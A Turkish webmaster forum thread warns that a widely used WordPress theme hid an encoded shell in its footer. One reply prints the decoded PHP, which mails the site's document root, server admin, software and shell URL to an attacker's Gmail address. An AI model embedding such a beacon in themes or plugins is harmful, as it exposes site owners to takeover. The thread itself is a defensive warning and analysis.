lostyazilim
tr.link

WP Temaları İndirirken Dikkat Edelim.

14 Mesajlar 2.403 Okunma
acebozum
tr.link

Costantine Costantine Web Tasarım, SEO Kullanıcı
  • Üyelik 10.10.2011
  • Yaş/Cinsiyet 38 / E
  • Meslek Web Tasarım, SEO
  • Konum
  • Ad Soyad C** K**
  • Mesajlar 82
  • Beğeniler 12 / 14
  • Ticaret 0, (%0)


Geçen gün yine sabahlarken bir wordpress tema hoşuma gitti ve indirdim..Temayı açıp inceliyordumki "footer" yerleştirilmiş bir shell kod düzeni gördüm.Ve bu tema baya yayıngın olan bir tema idi.


Bu kod düzenini parçaladığımda tüm bilgilere ulaşabilecek kod düzeni yazıldığını gördüm..Bunu sizinle paylaşıp indirdiğiniz tema dosyalarının tüm uzantılarını kontrol etmenizi öneririm..
escaperx NKara

kişi bu mesajı beğendi.

www.istanbultabelaci.info
elektronikssl
webimgo

Ryuzaki Ryuzaki Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 21.02.2012
  • Yaş/Cinsiyet - / E
  • Meslek Öğrenci
  • Konum
  • Ad Soyad ** **
  • Mesajlar 201
  • Beğeniler 25 / 76
  • Ticaret 6, (%100)
Merhaba, öncelikle teşekkürler. Kodu Çözmeye çalıştım, zaten decode, kolay iş. Kim olduğunu tahmin ettim, ve tahminimde de yanılmadım açıkçası.

Kodu Çözdüğümüzde ;

$kime="indirelimhemen@gmail.com";
$baslik="WordPresS Tema Sw Avcisi V3.0";
$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn";
$EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn";
$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn";
$EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn";
$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn";
mail($kime, $baslik, $EL_MuHaMMeD);


EL_MuHaMMeD Adında Bir Lamerin Kodlarını Görüyoruz. Bu Tarz Adamlar Lamerin Önde Gideni Olup, Hiçbirşeyden Anlamayan Bireylerdir Aslında.
Bir de Her Lafında Haşa "ALLAH" Kelimesi Eksik Olmaz, O ayrı mesele.

http://ryuzaki.in/wordpress-siteniz-hackleniyor-mu.Ryu

Bu Yazımda belirtmiştim durumu, fakat insanlar okumaktan bile üşenip sadece "sitem hacklendi" diye laf yapıyorlar, haykırıyorlar oraya, buraya.

Ne diyelim, hayırlısı. :)
NKara

kişi bu mesajı beğendi.

MaximusTR MaximusTR WM Aracı Kullanıcı
  • Üyelik 12.09.2011
  • Yaş/Cinsiyet 27 / E
  • Meslek Uygulama Geliştirme
  • Konum İstanbul Avrupa
  • Ad Soyad N** G**
  • Mesajlar 514
  • Beğeniler 48 / 94
  • Ticaret 0, (%0)
Bu decode işlemini nasıl yapıyoruz acaba ?
 

 

Costantine Costantine Web Tasarım, SEO Kullanıcı
  • Üyelik 10.10.2011
  • Yaş/Cinsiyet 38 / E
  • Meslek Web Tasarım, SEO
  • Konum
  • Ad Soyad C** K**
  • Mesajlar 82
  • Beğeniler 12 / 14
  • Ticaret 0, (%0)
Ben çözümü belirtmedim temayı kötülememk adına..Çözdüğün decobe doğrudur..
 

 

www.istanbultabelaci.info
wmaraci
wmaraci

Sinan Sinan Grana Kullanıcı
  • Üyelik 18.07.2011
  • Yaş/Cinsiyet 31 / E
  • Meslek Yazılım Geliştirme Uzmanı
  • Konum İstanbul Avrupa
  • Ad Soyad S** Y**
  • Mesajlar 3509
  • Beğeniler 1321 / 1320
  • Ticaret 97, (%100)
Bu tür adamların amaçları ne anlamıyorum.
 

 

Yrlmz Yrlmz WM Aracı Kullanıcı
  • Üyelik 24.12.2011
  • Yaş/Cinsiyet 37 / E
  • Meslek Kamu
  • Konum Konya
  • Ad Soyad ** **
  • Mesajlar 794
  • Beğeniler 24 / 137
  • Ticaret 5, (%100)
bilgilendirme için sağolun hocam.
 

 

Elbet birgün...

  • Üyelik 26.12.2024
  • Yaş/Cinsiyet - /
  • Meslek
  • Konum
  • Ad Soyad ** **
  • Mesajlar
  • Beğeniler /
  • Ticaret , (%)
çok sağolun tema kullanırken 1 kerz daha denetlemek şart
 

 

Kin Kin Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 05.03.2012
  • Yaş/Cinsiyet 30 / E
  • Meslek Öğrenci
  • Konum Kahramanmaraş
  • Ad Soyad ** **
  • Mesajlar 223
  • Beğeniler 5 / 39
  • Ticaret 1, (%0)
EL_MuHaMMeD Yazdıgı Kod
Bir Lamer Temaya Entegre Etmiş
 

 

FoRMaTTeR FoRMaTTeR WM Aracı Kullanıcı
  • Üyelik 05.01.2012
  • Yaş/Cinsiyet - / E
  • Meslek
  • Konum
  • Ad Soyad ** **
  • Mesajlar 79
  • Beğeniler 5 / 14
  • Ticaret 0, (%0)
aslında üşenmeyip aynı adamın yazdığı gibi ayarlican, farklı sitelerden geliyormuş gibi ama sahte mail atacan gün aşırı yada biraz kod yazıp otomatiğe de bağlanabilir. Sonra biton site gezsin dursun:)

Ek Olarak:

MaximusTR adlı üyeden alıntı

Bu decode işlemini nasıl yapıyoruz acaba ?


http://www.opinionatedgeek.com/dotnet/tools/base64decode/ mesela buraya kodu yazıp dönüştürebilirsin
 

 

Costantine Costantine Web Tasarım, SEO Kullanıcı
  • Üyelik 10.10.2011
  • Yaş/Cinsiyet 38 / E
  • Meslek Web Tasarım, SEO
  • Konum
  • Ad Soyad C** K**
  • Mesajlar 82
  • Beğeniler 12 / 14
  • Ticaret 0, (%0)

Adige46 adlı üyeden alıntı

EL_MuHaMMeD Yazdıgı Kod
Bir Lamer Temaya Entegre Etmiş


Bende bunun için konuya decode belirtmedim..Dediğin doğrudur..El Muhammed farklı işler için kullandığı bu scriptti başka kişiler bu temalara entegre etmektedir.
 

 

www.istanbultabelaci.info
wmaraci
wmaraci
Konuyu toplam 2 kişi okuyor. (0 kullanıcı ve 2 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al